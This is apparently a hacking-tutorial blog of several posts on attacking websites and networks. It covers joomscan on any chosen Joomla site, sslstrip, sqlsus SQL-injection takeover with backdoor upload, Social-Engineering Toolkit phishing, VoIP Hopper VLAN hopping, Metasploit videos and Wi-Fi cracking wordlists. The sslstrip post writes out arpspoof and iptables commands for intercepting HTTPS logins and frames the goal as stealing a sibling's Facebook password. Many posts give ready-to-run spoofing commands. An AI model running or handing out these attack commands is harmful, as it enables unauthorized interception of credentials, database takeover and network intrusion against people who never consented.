Showing posts with label Backtrack. Show all posts

Hacking Joomla Blog with Backtrack 5 r2

Here i am with a new working hack to scan and exploit a Joomla blog. Things you needed are following :--->
1.Backtrack 5
2.Internet connection
Here are following steps, please follow all the steps according to this post:

 1. Click on Applications/Backtrack/Vulnerability assesment/Web Vulnerability assessment/CMS Vulnerability Identification/joomscan.



2.Now Joomla scanner console will open like in image.
3.Now console will open now type chmod 0777 joomscan.pl and hit enter.

4.Now type  ./joomscan.pl -u www.YourJoomlasite.com in this in place of YourJoomalasite.com type your desired joomala site and hit enter it will start scanning it .

This article is written by Aditya Joshi, He blogs at  http://adityahackingarticles.blogspot.in . If you are intrested in writing article too then email me your article at haseeblog@gmail.com
Monday, April 16, 2012
Posted by Anonymous
16 Comments
Tag : ,

SSL Strip - Video Tutorial



What is SSL Strip?

SSL strip is a software that is used to sniff the data over HTTPS. The sniffer read all the data in a network with 9is send between a user and the Router but no a days SSH or "HTTPS" have made it very difficult to get useful data (Like Facebook Password of your brother in other room). So here is a tools that can even intercept the data over HTTPS.


Running sslstrip

  • Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
  • Run sslstrip. (sslstrip.py -l <listenPort>)
  • Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
At this point, sslstrip receives the traffic and does its magic.

VIDEO TUTORIAL
==============
Sunday, December 25, 2011
Posted by Anonymous
5 Comments
Tag : , , , ,

SQLsus - MySql Injection Tutorial


sqlsus is an open source MySQL injection and takeover tool, written in perl.
Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database(s), and much more...
Whenever relevant, sqlsus will mimic a MySQL console output.

sqlsus focuses on speed and efficiency, optimising the available injection space, making the best use (I can think of) of MySQL functions.
It uses stacked subqueries and an powerful blind injection algorithm to maximise the data gathered per web server hit.
Using multithreading on top of that, sqlsus is an extremely fast database dumper, be it for inband or blind injection.
If the privileges are high enough, sqlsus will be a great help for uploading a backdoor through the injection point, and takeover the web server.
It uses SQLite as a backend, for an easier use of what has been dumped, and integrates a lot of usual features (see below) such as cookie support, socks/http proxying, https..

FEATURES

GENERAL

Both quoted and numeric injections are supported.
Databases names, tables names, columns names, count(*) per table, privileges... On MySQL > 5, the database structure can be grabbed in one command from within sqlsus.
Discovery of the exact injection space, going through all possible restrictions (web server, suhosin patch...), to inject as much as possible at once.
All quoted texts can be translated as their hex equivalent to bypass any quotes filtering (eg: magic_quotes_gpc) (eg : "sqlsus" will become 0x73716c737573).
sqlsus also supports these types of injection :
  • inband (UNION w/ stacked subqueries) : the result of the request will be in the HTML returned by the web server
  • blind (boolean-based or time-based) : when you can't see the result of the request directly
Support for GET and POST parameters injection vectors.
Support for HTTP proxy and HTTP simple authentication.
Support for HTTPS.
Support for socks proxy.
Support for cookies.
Support for binary data retrieving.
Full SQLite backend, storing queries / results as they come, databases structure, key variables. This allows you to recall a command and its cached answer, even in a later re-use of the session.
Possibility to clone a database / table / column, into a local SQLite database, and continue over different sessions.
If you can't access the information_schema database, or if it doesn't exist, sqlsus will help you bruteforce the names of the tables and columns.
Possibility to change the current database and still use all the commands transparently.
Auto-detection of the length restriction in place, be it the web server or the layer above (eg: suhosin).

INBAND

If your query is likely to return more than one row, sqlsus will use as many subqueries it can use at a time (per query), staying under a configurable limit.
Therefore, it can grab up to thousands of records in just 1 server hit (depending on the available injection space) (cf inband demo)
Once you have found an inband injection, you need to find the correct number of columns for UNION. sqlsus will do the job for you, identifying the needed number of columns, and which of them are suitable for injection.
To speed things up, multithreading (actually, multiple processes (fork)) can be used.

BLIND

Blind injection is supported, using conditional responses, and multithreading (actually, again, multiple processes (fork)).
The engine has been optimised in speed and server hit :
  • keep all the threads busy with small relevant tasks.
  • match each item against a few regular expressions, prior to bruteforcing, to determine the character space to use, reducing a lot the number of hits required.

TAKEOVER

If the database user has the FILE privilege, and if you can use quotes in your injection (mandatory for a SELECT INTO OUTFILE), then sqlsus will help you place a php backdoor on the remote system, recursively looking for writable directories.
You can use download <file> from sqlsus shell, to download an arbitrary (world readable) file from the remote server. The file will be stored in the local filesystem, rebuilding the path tree to the file in the datadirectory.
sqlsus has the ability to crawl the website at a configurable depth, looking for all the directories it can find, via hypertext links, img links, etc... Then, it tries to upload a tiny php uploader on each candidate directory until it finds one world writable, later used to upload the backdoor itself.
All sqlsus needs (besides what has been said above) is the document_root used server side. You can find it by downloading/reading the relevant files on the web server.
It ships with a PHP backdoor you can upload and a controller, to help you execute system commands, PHP commands, and SQL queries as if you were sitting on a normal direct MySQL connection.

GETTING STARTED

Generate a configuration file with sqlsus --genconf my.cfg, read the comments and adapt it to reflect your target.
Launch sqlsus, with your configuration as a parameter sqlsus my.cfg, you will get a shell.
Type help and follow your instincts :)


Sources:
Sunday, December 18, 2011
Posted by Anonymous
2 Comments
Tag : , ,

Social-Engineering Toolkit (SET) - Video Tutorials





The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack, one is utilizing Metasploit[1] payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering.


Official Site: http://www.social-engineer.org/



Sample Usage:
==========================================



root@netinfinity-laptop:/pentest/web_2a/web2a/social_engineering_toolkit# python set


    [---]       The Social Engineering Toolkit (SET)     [---]
    [---] Written by David Kennedy (ReL1K) @ SecureState [---]
    [---]               Version: 0.2 Alpha               [---]

Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs. 

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Update the Social-Engineering Toolkit
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit

Enter your choice:





VIDEO TUTORIALS:


1:  Phishing Attack Demo Using The Social Engineering Toolkit

2:  Java Applet Attack Using The Social Engineering Toolkit


Source: http://tools.securitytube.net/index.php?title=Social-Engineering_Toolkit_(SET)
Friday, December 9, 2011
Posted by Anonymous
1 Comment
Tag : , ,

VoIP Hopper - Features and Video Tutorial





VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop security test.  VoIP Hopper is a VoIP infrastructure security testing tool but also a tool that can be used to test the (in)security of VLANs. 


Features:



  • Can automatically discover the VLAN ID and VLAN Hop (add a VoIP Interface, send a "tagged" dhcp request)
  • VLAN protocol discovery methods:  CDP, Avaya DHCP, Nortel DHCP, LLDP-MED (Cisco), 802.1q
  • Assessment mode:  Interactive, menu driven command interface (-z)
  • Assessment mode:  Manually spoof CDP or LLDP-MED, or automatically VLAN Hop based on first discovered VVID
  • Assessment mode:  DHCP client automatically times out if DHCP is disabled, and still adds the VoIP interface and ARP sniffer
  • Assessment mode:  Can set a static IP address and spoof the MAC address of a previously discovered IP Phone, from a menu list ('s' option)
  • Assessment mode:  Analyze and record any discovered hosts (IP and MAC) on default interface to hosts.txt file
  • Assessment mode:  Automatically adds an ARP sniffer to VoIP VLAN interface after VLAN Hop, and records any discovered IP Phones (IP and MAC) to a file, voip-hosts.txt
  • Can VLAN Hop without discovery, by the Administrator specifying a VLAN ID to attempt to "Hop" into (-v)
  • VoIP DHCP client:  A fully integrated DHCP client.  VoIP Hopper implements DHCP messaging as function calls instead of relying on the old 'dhcpcd' client.  This opens up the door for future VLAN Discovery mechanisms for other vendors, such as Alcatel.
  • CDP Modes:  Can spoof a Cisco IP Phone and automatically VLAN Hop, using three methods.  1)  CDP sniffing, 2) Spoofing a CDP packet specified by user input, 3) Spoofing a pre-constructed IP Phone packet of a Cisco 7971G-GE (fastest method)
  • Avaya IP Phone VLAN discovery:  Can spoof the DHCP client Option 176 used by an Avaya IP Phone in order to automatically discover the VVID, and VLAN Hop.
  • Nortel IP Phone VLAN discovery:  Can spoof the DHCP client Option 191 used by a Nortel IP Phone in order to automatically discover the VVID, and VLAN Hop.
  • LLDP-MED support:  Support for sniffing or spoofing LLDP-MED capabilities used by an IP Phone, in order to enumerate the Voice VLAN ID.
  • 802.1q VLAN Discovery:  By default, most ethernet switch ports that terminate IP Phones are enabled for 802.1q trunking, and permit access for at least two VLANs.  The broadcast ethernet frames of IP Phones (ARP) will be sent, tagged, to all members (switch ports) of the broadcast domain (all IP Phones on the VoIP VLAN).  By running a simple sniffer, you can capture the VVID.  VoIP Hopper automates this method of VVID discovery.
  • Error correction with VLAN Interfaces:  Implemented a feature that checks to see if the IP address is already configured for the voice interface before attempting to add the new virtual interface, and tag the DHCP request.
  • 802.1x Anonymous Voice VLAN Bypass:  VoIP Hopper can generate CDP packets in order to discover the Voice VLAN ID, as any IP Phone based on CDP would do.  In this CDP spoof mode, VoIP Hopper will send two CDP packets in order to decipher the VVID, then it will iterate between sleeping for 60 seconds, and sending another packet.  Not only is this faster than CDP sniffing, but it can also help bypass any mechanisms that rely on CDP for permitting access to the Voice VLAN.
  • Voice VLAN Interface Delete:  VoIP Hopper can delete the created Voice interface (-d).
  • MAC Address Spoof, then exit:  VoIP Hopper can change the MAC Address of an interface offline and exit, without VLAN Hopping.
  • MAC Address spoof and automatic VLAN Hop, supporting multiple discovery methods
  • MAC Address spoof, only on new VoIP Interface (keep default interface the same MAC Address) (-D)

Example Usage:


Some quick samples usages for VoIP Hopper are listed below.

  • One of the most effective ways to run VoIP Hopper is the new, interactive assessment mode.  Simply run it as follows:  
        voiphopper -i eth0 -z
  • LLDP-MED spoofing:  You can spoof LLDP-MED packets to quickly learn the Voice VLAN ID, as follows:
        voiphopper -i eth0 -o 001EF7289C8E
  • There are three CDP modes for VoIP Hopper.  Sniff (-c 0), Spoof with custom packet (-c 1), and Spoof with pre-made packet (-c 2).  To sniff for CDP and run a VLAN Hop into the Voice VLAN, simply run VoIP Hopper on the ethernet interface, in the following way:
        voiphopper -i eth0 -c 0
  • To spoof CDP in order to more rapidly hop to the Voice VLAN in Cisco SIP environments, run VoIP Hopper in the following way:
          voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S              'P003-08-8-00' -U 1
  • To spoof CDP in order to more rapidly hop to the Voice VLAN in Cisco SCCP environments, run VoIP Hopper in the following way:
        voiphopper -i eth0 -c 1 -E 'SEP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S                 'P00308000700' -U 1
  • To spoof CDP with a pre-made packet generated by a Cisco 7971G-GE IP Phone:
        voiphopper -i eth0 -c 2
  • VoIP Hopper also allows one to VLAN Hop to an arbitrary VLAN, without sniffing for CDP.  If you already know the Voice VLAN ID, or would like to VLAN Hop into another VLAN (without sniffing for CDP), you can run it in the following way (target VLAN ID is '200'):
        voiphopper -i eth0 -v 200
  • To discover the Voice VLAN in an Avaya IP Phone environment and automatically jump VLANs:
        voiphopper -i eth0 -a
  • To discover the Voice VLAN in a Nortel IP Phone environment and automatically jump VLANs:
        voiphopper -i eth0 -n
  • To spoof the MAC address of an IP Phone by sniffing for CDP (this changes the MAC address of default interface and new interface):
        voiphopper -i eth0 -c 0 -m AA:AA:AA:AA:AA:AA
  • To spoof the MAC address of an IP Phone using an Avaya DHCP request (this changes the MAC address of default interface and new interface):
        voiphopper -i eth0 -a -m AA:AA:AA:AA:AA:AA
  • To spoof the MAC address of an IP Phone by VLAN Hopping without CDP or DHCP (this changes the MAC address of default interface and new interface):
        voiphopper -i eth0 -v 200 -m AA:AA:AA:AA:AA:AA
  • To spoof the MAC address of an IP Phone without changing the MAC address of the default ethernet interface (only spoof the new voice interface's MAC address):
        voiphopper -i eth0 -v 200 -m AA:AA:AA:AA:AA:AA -D
  • To simply spoof the MAC address of an interface and then exit.
        voiphopper -i eth0 -m AA:AA:AA:AA:AA:AA
  • To delete the VoIP interface (eth0.200) created by VoIP Hopper:
        voiphopper -d eth0.200


                                                                 ==============
                                                                ==============

VIDEO Tutorials:

Tutorial 1:  Assessment Mode video tutorial for VoIP Hopper 2.0

Here is a tutorial demonstrating the new, exciting features for Assessment mode.  Until I can integrate DHCP spoofing for Avaya/Nortel into assessment mode, I've also shown how to do both Avaya and Nortel VLAN discovery at the end of the video.


Tutorial 2:  LLDP-MED features of VoIP Hopper

Here is a tutorial demonstrating the new LLDP-MED capabilities.


Tutorial 3:  Hotel Exploit Demo ~ When DHCP is disabled

Here is a tutorial demonstrating the same live demo showed at DefCon 19, in which DHCP was disabled on the VoIP VLAN subnet.  VoIP Hopper can still VLAN Hop and spoof the IP and MAC address of an IP Phone, as selected by the user.  This is a demonstration of the "s" option of Assessment mode.
Wednesday, December 7, 2011
Posted by Anonymous
3 Comments
Tag : , , ,

ARMITAGE AND METASPLOIT TRAINING: Team Tactics!



Today is the last episode of this training and it deals with the team tactics involved in using Metasploit!

==========
Team Tactics:
==========

Saturday, November 26, 2011
Posted by Anonymous
3 Comments
Tag : , , ,

ARMITAGE AND METASPLOIT TRAINING: Maneuver

Today it the fifth part of the Series and it deals with the Maneuver.


=========
Maneuver:
=========


Thursday, November 24, 2011
Posted by Anonymous
0 Comments
Tag : , , ,

ARMITAGE AND METASPLOIT TRAINING: Post-Exploitation





This Video Tutorial deals with the Post-Exploitation Stuff and details.

============
Post-Exploitation:
============

Wednesday, November 23, 2011
Posted by Anonymous
5 Comments
Tag : , , ,

Armitage And Metasploit Training: Access





Today is turn for the third part of the instalment it is about exploiting and accessing the compromised machine.

=======
ACCESS:
=======


Tuesday, November 22, 2011
Posted by Anonymous
1 Comment
Tag : , ,

Armitage And Metasploit Training: METASPLOIT.


Today is second intallment of the Metasploit and Armitage Training. This video will deal with operating Metasploit Framework.

===========
METASPLOIT:
===========


Monday, November 21, 2011
Posted by Anonymous
3 Comments
Tag : , , ,

Armitage And Metasploit Training: Introduction.




Today I am going to share a very good Video Training on the Pen testing about the famous Metasploit and Armitage, Today comes the first part that covers the introduction others will soon follow.

==============
INTRODUCTION:
==============


Sunday, November 20, 2011
Posted by Anonymous
1 Comment
Tag : , , ,

WPA/WEP/WPA2 Cracking Dictionary Wordlist


Somedays back i got a request from my blog's reader about the WEP,WPA,WP2 or Wifi cracking Dictionary files. As all the people who have tried wireless hacking and used the cracking software, they all know that the dictionary or wordlist provided by the Software is not enough and lack alot. So following are links to the websites where you can download the wordlist for free.



====================
Sourcehttp://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/
===============

AND here is the torrent link to the biggest wordlist available on the internet. It is more then 13 GB of size and contain Billions of passwords!

Link:> http://torcache.net/torrent/6C89DF058F71559DEC6C5C7C9F2CB419182B3294.torrent?title=[kat.ph]collection.of.wordlist.dictionaries.for.cracking.wifi.wpa.wpa2


A thanks is all i need and BTW if any one of you have any request let me know!
Tuesday, November 8, 2011
Posted by Anonymous
4 Comments
Tag : , , , ,

Popular Post

Labels

- Copyright © _.:Learn To Hack:._ :: Hacking Tutorials :: Warez -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan -